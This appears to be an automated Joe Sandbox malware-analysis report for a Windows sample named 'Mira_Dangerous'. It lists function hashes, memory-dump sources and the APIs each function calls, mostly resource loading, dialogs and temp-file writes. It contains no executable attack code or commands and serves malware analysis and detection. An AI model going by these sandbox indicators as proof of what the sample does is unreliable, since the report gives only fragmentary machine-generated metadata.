  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Window$CapsDeviceRect$Release
  • String ID:
  • API String ID: 2212493051-0
  • Opcode ID: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
  • Instruction ID: e6d2d9031c61823003b92421acd2c0a82ae0ef2902dbc01236aad64b05c5502b
  • Opcode Fuzzy Hash: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
  • Instruction Fuzzy Hash: 01318172B256018AE7109B65E8045BDFBB0F749B59F95A1B0CE0953B68CF3CE4498F14
APIs
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5078
    • Part of subcall function 00007FF7A8CC5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5089
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50AF
    • Part of subcall function 00007FF7A8CC5050: LoadResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50C0
    • Part of subcall function 00007FF7A8CC5050: LockResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50CF
    • Part of subcall function 00007FF7A8CC5050: memcpy_s.MSVCRT ref: 00007FF7A8CC50EE
    • Part of subcall function 00007FF7A8CC5050: FreeResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50FD
  • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF7A8CC3139), ref: 00007FF7A8CC3F95
  • LocalFree.KERNEL32 ref: 00007FF7A8CC4018
    • Part of subcall function 00007FF7A8CC4DCC: LoadStringA.USER32 ref: 00007FF7A8CC4E60
    • Part of subcall function 00007FF7A8CC4DCC: MessageBoxA.USER32 ref: 00007FF7A8CC4EA0
    • Part of subcall function 00007FF7A8CC7700: GetLastError.KERNEL32 ref: 00007FF7A8CC7704
  • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF7A8CC3139), ref: 00007FF7A8CC403E
  • LocalFree.KERNEL32(?,?,?,?,?,00007FF7A8CC3139), ref: 00007FF7A8CC409F
    • Part of subcall function 00007FF7A8CC7AC8: FindResourceA.KERNEL32 ref: 00007FF7A8CC7AF2
    • Part of subcall function 00007FF7A8CC7AC8: LoadResource.KERNEL32 ref: 00007FF7A8CC7B09
    • Part of subcall function 00007FF7A8CC7AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF7A8CC7B3F
    • Part of subcall function 00007FF7A8CC7AC8: FreeResource.KERNEL32 ref: 00007FF7A8CC7B51
  • LocalFree.KERNEL32 ref: 00007FF7A8CC4078
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
  • String ID: <None>$LICENSE
  • API String ID: 2414642746-383193767
  • Opcode ID: 6bd63647ce96d4f8b0065cac43a1c91a38b3f5c003b37170c5f220880f70fde1
  • Instruction ID: 1a4b62d9c08e3595c7b7788a08819a962009d76e005f516f72497133bab626d6
  • Opcode Fuzzy Hash: 6bd63647ce96d4f8b0065cac43a1c91a38b3f5c003b37170c5f220880f70fde1
  • Instruction Fuzzy Hash: 2A315AB1A1B60286F710BF20E45437AEA60FB84745FC2A1B5DA0D466B0DF7DA0048F28
APIs
    • Part of subcall function 00007FF7A8CC114C: _vsnprintf.MSVCRT ref: 00007FF7A8CC1189
  • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7A8CC606F), ref: 00007FF7A8CC7763
  • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7A8CC606F), ref: 00007FF7A8CC7772
  • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7A8CC606F), ref: 00007FF7A8CC77B8
  • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7A8CC606F), ref: 00007FF7A8CC77EC
  • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7A8CC606F), ref: 00007FF7A8CC7805
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$Free$FindLoadLock_vsnprintf
  • String ID: UPDFILE%lu
  • API String ID: 2922116661-2329316264
  • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
  • Instruction ID: 73c4077e931900bd4ab78ae953d885b254890b034f8b47cd5268df67a514d3e1
  • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
  • Instruction Fuzzy Hash: BB3193B2A0A641C6E710AB25A400179FBA0FB89B50F96A275DA5E437B4CF3CE405CB14
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
  • String ID:
  • API String ID: 3370778649-0
  • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
  • Instruction ID: dbe815e409d0bebccc27f65d83a9fedb7b7780cfa800c47718abc47582e49049
  • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
  • Instruction Fuzzy Hash: D21130B170AB4187E7146B62A844079FAA0FB4EFD1F8AA1B4DD4E43764DF3CD4458B14
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
  • String ID: wininit.ini
  • API String ID: 3273605193-4206010578
  • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
  • Instruction ID: c42beab2e710bb34042b77242d6702ab887c68e5cf23c8352c8b61e7ffcf1076
  • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
  • Instruction Fuzzy Hash: 6E116D72605A8187E720AB21E8542BAF7A1FBCC715FC691B1DA4E437A4DF3CD509CE04
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Window$Text$DesktopDialogForegroundItem
  • String ID: Mira
  • API String ID: 761066910-679536105
  • Opcode ID: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
  • Instruction ID: e23f30ef487be0599229bba2b6a9e36cde2b75ad6337e26f5cf26ab2f016b57a
  • Opcode Fuzzy Hash: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
  • Instruction Fuzzy Hash: D41107E1D0A642C6F7547B66B804279EA51EB4AB41FC6B1B1D90E067B4CF3CA444CE28
APIs
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5078
    • Part of subcall function 00007FF7A8CC5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5089
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50AF
    • Part of subcall function 00007FF7A8CC5050: LoadResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50C0
    • Part of subcall function 00007FF7A8CC5050: LockResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50CF
    • Part of subcall function 00007FF7A8CC5050: memcpy_s.MSVCRT ref: 00007FF7A8CC50EE
    • Part of subcall function 00007FF7A8CC5050: FreeResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50FD
  • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7A8CC3388), ref: 00007FF7A8CC4975
  • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF7A8CC3388), ref: 00007FF7A8CC4A11
    • Part of subcall function 00007FF7A8CC4DCC: LoadStringA.USER32 ref: 00007FF7A8CC4E60
    • Part of subcall function 00007FF7A8CC4DCC: MessageBoxA.USER32 ref: 00007FF7A8CC4EA0
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
  • String ID: <None>$@$FINISHMSG
  • API String ID: 3507850446-4126004490
  • Opcode ID: 031df703cbb964bc01a60307a5d5bedcc318b480afccef988b7b3524bd41fc15
  • Instruction ID: 64b6e9b69a80356c73d9731a218752fd2b9b8b5646e99e7d2c5862b45e9d90ef
  • Opcode Fuzzy Hash: 031df703cbb964bc01a60307a5d5bedcc318b480afccef988b7b3524bd41fc15
  • Instruction Fuzzy Hash: 0A1184B2A0974287F720AB20F45177AF690FB85755FC6A1B4DA4E42AA4DF3CD0488F1C
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: LibraryLoad$AttributesFile
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
  • API String ID: 438848745-258089097
  • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
  • Instruction ID: 1570eb5ac33d25c01895b4b45d57c937b2072501f0e628e6e6c19e3bcd127489
  • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
  • Instruction Fuzzy Hash: 23116FB1A1A68285EF61AB14E4502F9F7A0FB89704FC672B1C59D426B1CF3CD60ACF14
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
  • String ID:
  • API String ID: 1273765764-0
  • Opcode ID: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
  • Instruction ID: df9702b8a3e8c5beff0ff1d6a6001b7247a7fa56ad736fe5ced7f0fa413fc90d
  • Opcode Fuzzy Hash: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
  • Instruction Fuzzy Hash: 6411B4B1A09A8586EA506B51F4043B9F760FB89B54F86A3B1DA5E073E4CF3CD445CF14
APIs
  • GetVersionExA.KERNEL32 ref: 00007FF7A8CC3C3F
  • MessageBeep.USER32 ref: 00007FF7A8CC3EB9
    • Part of subcall function 00007FF7A8CC7F04: GetVersionExA.KERNEL32 ref: 00007FF7A8CC7F59
    • Part of subcall function 00007FF7A8CC7F04: GetSystemMetrics.USER32 ref: 00007FF7A8CC7F93
    • Part of subcall function 00007FF7A8CC7F04: RegOpenKeyExA.ADVAPI32 ref: 00007FF7A8CC7FC8
    • Part of subcall function 00007FF7A8CC7F04: RegQueryValueExA.ADVAPI32 ref: 00007FF7A8CC8003
    • Part of subcall function 00007FF7A8CC7F04: RegCloseKey.ADVAPI32 ref: 00007FF7A8CC8016
    • Part of subcall function 00007FF7A8CC7F04: CharNextA.USER32 ref: 00007FF7A8CC8065
  • MessageBoxA.USER32 ref: 00007FF7A8CC3EF3
    • Part of subcall function 00007FF7A8CC7E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF7A8CC7E8C
    • Part of subcall function 00007FF7A8CC7E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF7A8CC7ECA
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
  • String ID: Mira
  • API String ID: 2312377310-679536105
  • Opcode ID: 863b2b2085453d1b908c50441a0eaeb3b9e2f95aa7a0fcc7b82c6bcc3126a943
  • Instruction ID: 50ee7d8f3fa9250ba9ccc88793ca2a95894167a3497af9bb4f84f3f6dbc189c7
  • Opcode Fuzzy Hash: 863b2b2085453d1b908c50441a0eaeb3b9e2f95aa7a0fcc7b82c6bcc3126a943
  • Instruction Fuzzy Hash: 00A1A8B2E1B14286F760AF25A44467BF664FF44754F9321B9E90D872A0CE3DE845CF28
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: File$CloseCreateHandleWrite
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
  • API String ID: 1065093856-2312194364
  • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
  • Instruction ID: a095456c3ee46ff799ff454488039334406548df50c36cf0fb40121166dced24
  • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
  • Instruction Fuzzy Hash: A831D2B260968186EB60AF14E4407BAF760FB89BA4F855274DB9D477A4CF7CD408CF24
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID:
  • String ID: *MEMCAB
  • API String ID: 0-3211172518
  • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
  • Instruction ID: 5bf70faf4ced32100706c07ee8cea6e0997aeb65235ae388d7c5902db18d3bc7
  • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
  • Instruction Fuzzy Hash: 51314AB1A0AB4285EB50AB11E4483B9F7A0BB44791FC66276D55C423B0EF3CE489CF24
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
  • String ID:
  • API String ID: 140117192-0
  • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
  • Instruction ID: 1ce37870135c58ad70c76af6b988da2ef1b50825ca60aead9965d316e89ea36d
  • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
  • Instruction Fuzzy Hash: 1141E6B5A0AB0181EB50EB18F890366F364FB88744F926176DA8D82774DF3CE159DB24
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$DialogFindFreeIndirectLoadParam
  • String ID:
  • API String ID: 1214682469-0
  • Opcode ID: 99feb220bc4d7b18b994646d80799ee091b3782a70530dd697189ae1540c7553
  • Instruction ID: ab4290b57b4d52894cefd446244f4d0c6da0589972beb3ccfa0b825aae8d76cc
  • Opcode Fuzzy Hash: 99feb220bc4d7b18b994646d80799ee091b3782a70530dd697189ae1540c7553
  • Instruction Fuzzy Hash: 39115171A09B4186EA109B15F450279FA60FB49FE1F895774DE5D07BA4DF3CD4408B18
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Char$Prev$Next
  • String ID:
  • API String ID: 3260447230-0
  • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
  • Instruction ID: ac7408e1f59e0d2a1e8837d6bbd0105a770f3669166e3ab591282499efaf3f1a
  • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
  • Instruction Fuzzy Hash: 8A11CAA2E0AA9285FB511B25B500179EFA1E74DFE0F8AA3B0DA5F03794CF3CD4408B14
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
  • String ID:
  • API String ID: 140117192-0
  • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
  • Instruction ID: e9d5af0d013f69fe05184b611cb4149576c9f742cad34aff08d22e4bcf15fc7d
  • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
  • Instruction Fuzzy Hash: E721F5B591AB4181E700AB04F8803A6F3A4FB84744F912076DA8D43774DF3CD059DB28